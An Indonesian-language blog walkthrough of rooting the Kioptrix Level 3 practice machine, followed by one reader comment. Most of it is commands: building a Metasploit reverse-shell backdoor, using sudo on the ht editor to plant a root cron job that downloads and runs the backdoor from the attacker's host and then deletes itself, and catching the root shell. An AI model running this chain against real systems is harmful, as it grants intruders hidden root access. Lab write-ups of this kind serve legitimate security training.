Pada Pentest kali ini, saya akan mendemonstrasikan menyerang web server yang menggunakan Ubuntu dengan Metasploit.
Note: IP address saya 192.168.1.2
Preparation:
1. Metasploit ---> Download Page
Briefing:
1. Buat backdoor
2. Buat Script untuk mendownload backdoor yang sudah kita buat
3. Jalankan exploit multi handler dan Game Over
Walkthrough:
1. Buat backdoor
root@red-dragon:# cd /pentest/exploits/framework2
root@red-dragon:/pentest/exploits/framework2# msfpayload -p linux x86/shell/reverse_tcp LHOST=192.168.1.2 LPORT=4444 X > /var/www/back.door
2. Buat Script untuk mendownload backdoor yang sudah kita buat
Buka terminal, lalu masukan perintah:
root@red-dragon:/pentest/exploits/framework2# ssh loneferret@kioptrix3.com
Masukan password.
Note: Password bisa dilihat pada post sebelumnya mengenai [KIOPTRIX LV 3] Attack User
Kemudian
loneferret@kioptrix3:~$ sudo ht
Note: Jika ditanyakan password, masukan password loneferret
Password bisa dilihat pada post sebelumnya mengenai [KIOPTRIX LV 3] Attack User
Pada console ht, tekan atl+f kemudian pilih new
Masukan kode berikut:
* * * * * root cd /tmp/; wget 192.168.1.2/back.door && chmod +x && ./back.door; rm /etc/cron.d/exploit
Tekan alt+f kemudian pilih save, dan masukan nama file dengan nama /etc/cron.d/exploit
3. Jalankan exploit multi handler dan Game Over
Buka terminal masukan perintah:
root@red-dragon:/pentest/exploits/framework2# msfcli multi/handler PAYLOAD=linux x86/shell/reverse_tcp LHOST=192.168.1.2 LPORT=4444 E
Tunggu sejanak.. Daaaaaaaan..
Berhasil.. Command Shell sesi pertama telah terbuka. Dalam keadaan ini, kita telah mengendalikan system dengan terminal atas nama root (administrator)
Created:
red-dragon
Supported by:
Bule Dragon
Loved by:
Yoshephine Handini
gan ssh loneferret@kioptrix3.com
ReplyDeletessh: Could not resolve hostname kioptrix3.com: Name or service not known